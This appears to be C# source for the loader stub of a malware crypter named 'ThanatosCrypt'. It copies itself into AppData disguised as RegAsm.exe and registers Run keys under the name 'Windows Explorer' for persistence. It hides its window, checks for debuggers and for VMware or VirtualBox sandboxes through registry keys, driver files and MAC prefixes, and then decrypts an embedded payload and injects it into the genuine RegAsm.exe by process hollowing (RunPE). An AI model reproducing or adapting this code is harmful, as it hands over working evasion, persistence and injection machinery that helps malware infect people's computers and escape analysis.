public static string installDir = Environment.GetEnvironmentVariable("appdata") + "\\Windows .NET Framework"; public static string installLoc = installDir + "\\RegAsm.exe"; public static string myreg = "Windows Explorer"; public static void AddStartup() { try { RegistryKey sKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (sKey.GetValue(myreg) == null) { sKey.SetValue(myreg, installLoc); sKey.Close(); } else { try { RegistryKey cKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (cKey.GetValue(myreg) == null) { cKey.SetValue(myreg, installLoc); } else { } } catch { } try { RegistryKey cKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (cKey.GetValue(myreg) == null) { cKey.SetValue(myreg, installLoc); } else { } } catch { } } } catch { } } public static void EnvSetup() { if (System.Reflection.Assembly.GetExecutingAssembly().Location != installLoc) { try { if (!Directory.Exists(installDir)) { Directory.CreateDirectory(installDir); } File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, installLoc); } catch { } } else { } AddStartup(); } [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); [DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)] internal static extern bool IsDebuggerPresent(); public Form1() { InitializeComponent(); SetVisibleCore(false); // get application GUID as defined in AssemblyInfo.cs string appGuid = ((GuidAttribute)Assembly.GetExecutingAssembly(). GetCustomAttributes(typeof(GuidAttribute), false). GetValue(0)).Value.ToString(); // unique id for global mutex - Global prefix means it is global to the machine string mutexId = string.Format("Global\\{{{0}}}", appGuid); // Need a place to store a return value in Mutex() constructor call bool createdNew; // edited by Jeremy Wiebe to add example of setting up security for multi-user usage // edited by 'Marc' to work also on localized systems (don't use just "Everyone") var allowEveryoneRule = new MutexAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid , null) , MutexRights.FullControl , AccessControlType.Allow ); var securitySettings = new MutexSecurity(); securitySettings.AddAccessRule(allowEveryoneRule); // edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen using (var mutex = new Mutex(false, mutexId, out createdNew, securitySettings)) { // edited by acidzombie24 var hasHandle = false; try { // note, you may want to time out here instead of waiting forever // edited by acidzombie24 // mutex.WaitOne(Timeout.Infinite, false); hasHandle = mutex.WaitOne(5000, false); if (hasHandle == false) throw new TimeoutException("Timeout waiting for exclusive access"); } catch (AbandonedMutexException) { // Log the fact that the mutex was abandoned in another process, // it will still get acquired hasHandle = true; } bool isRemoteDebuggerPresent = false; CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isRemoteDebuggerPresent); List EvidenceOfSandbox = new List(); List sandboxStrings = new List { "vmware", "virtualbox", "vbox", "qemu", "xen" }; string[] HKLM_Keys_To_Check_Exist = {@"HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier", @"SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S", @"SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev", @"SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers", @"SOFTWARE\VMWare, Inc.\VMWare Tools", @"SOFTWARE\Oracle\VirtualBox Guest Additions", @"HARDWARE\ACPI\DSDT\VBOX_"}; string[] HKLM_Keys_With_Values_To_Parse = {@"SYSTEM\ControlSet001\Services\Disk\Enum\0", @"HARDWARE\Description\System\SystemBiosInformation", @"HARDWARE\Description\System\VideoBiosVersion", @"HARDWARE\Description\System\SystemManufacturer", @"HARDWARE\Description\System\SystemProductName", @"HARDWARE\Description\System\Logical Unit Id 0"}; foreach (string HKLM_Key in HKLM_Keys_To_Check_Exist) { RegistryKey OpenedKey = Registry.LocalMachine.OpenSubKey(HKLM_Key, false); if (OpenedKey != null) { EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key); } } foreach (string HKLM_Key in HKLM_Keys_With_Values_To_Parse) { string valueName = new DirectoryInfo(HKLM_Key).Name; try { string value = (string)Registry.LocalMachine.OpenSubKey(Path.GetDirectoryName(HKLM_Key), false).GetValue(valueName); foreach (string sandboxString in sandboxStrings) { if (!string.IsNullOrEmpty(value) && value.ToLower().Contains(sandboxString.ToLower())) { EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key + " => " + value); } } } catch { } } string[] FilePaths = {@"C:\windows\Sysnative\Drivers\Vmmouse.sys", @"C:\windows\Sysnative\Drivers\vm3dgl.dll", @"C:\windows\Sysnative\Drivers\vmdum.dll", @"C:\windows\Sysnative\Drivers\vm3dver.dll", @"C:\windows\Sysnative\Drivers\vmtray.dll", @"C:\windows\Sysnative\Drivers\vmci.sys", @"C:\windows\Sysnative\Drivers\vmusbmouse.sys", @"C:\windows\Sysnative\Drivers\vmx_svga.sys", @"C:\windows\Sysnative\Drivers\vmxnet.sys", @"C:\windows\Sysnative\Drivers\VMToolsHook.dll", @"C:\windows\Sysnative\Drivers\vmhgfs.dll", @"C:\windows\Sysnative\Drivers\vmmousever.dll", @"C:\windows\Sysnative\Drivers\vmGuestLib.dll", @"C:\windows\Sysnative\Drivers\VmGuestLibJava.dll", @"C:\windows\Sysnative\Drivers\vmscsi.sys", @"C:\windows\Sysnative\Drivers\VBoxMouse.sys", @"C:\windows\Sysnative\Drivers\VBoxGuest.sys", @"C:\windows\Sysnative\Drivers\VBoxSF.sys", @"C:\windows\Sysnative\Drivers\VBoxVideo.sys", @"C:\windows\Sysnative\vboxdisp.dll", @"C:\windows\Sysnative\vboxhook.dll", @"C:\windows\Sysnative\vboxmrxnp.dll", @"C:\windows\Sysnative\vboxogl.dll", @"C:\windows\Sysnative\vboxoglarrayspu.dll", @"C:\windows\Sysnative\vboxoglcrutil.dll", @"C:\windows\Sysnative\vboxoglerrorspu.dll", @"C:\windows\Sysnative\vboxoglfeedbackspu.dll", @"C:\windows\Sysnative\vboxoglpackspu.dll", @"C:\windows\Sysnative\vboxoglpassthroughspu.dll", @"C:\windows\Sysnative\vboxservice.exe", @"C:\windows\Sysnative\vboxtray.exe", @"C:\windows\Sysnative\VBoxControl.exe"}; foreach (string FilePath in FilePaths) { if (File.Exists(FilePath)) { EvidenceOfSandbox.Add(FilePath); } } string[] badMacAddresses = { @"000C29", @"001C14", @"005056", @"000569", @"080027" }; NetworkInterface[] NICs = NetworkInterface.GetAllNetworkInterfaces(); foreach (NetworkInterface NIC in NICs) { foreach (string badMacAddress in badMacAddresses) { if (NIC.GetPhysicalAddress().ToString().ToLower().Contains(badMacAddress.ToLower())) { EvidenceOfSandbox.Add(Regex.Replace(NIC.GetPhysicalAddress().ToString(), ".{2}", "$0:").TrimEnd(':')); } } } if (!IsDebuggerPresent() && !isRemoteDebuggerPresent && !System.Diagnostics.Debugger.IsAttached && EvidenceOfSandbox.Count == 0) { RunPE.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"), Decryptor.Decrypt(Encoding.ASCII.GetBytes("DSNVLUOHFWE"), Encoding.Default.GetBytes(ThanatosCrypt.Resource1.primary))); EnvSetup(); } // edited by acidzombie24, added if statement if (hasHandle) mutex.ReleaseMutex(); Environment.Exit(0); } }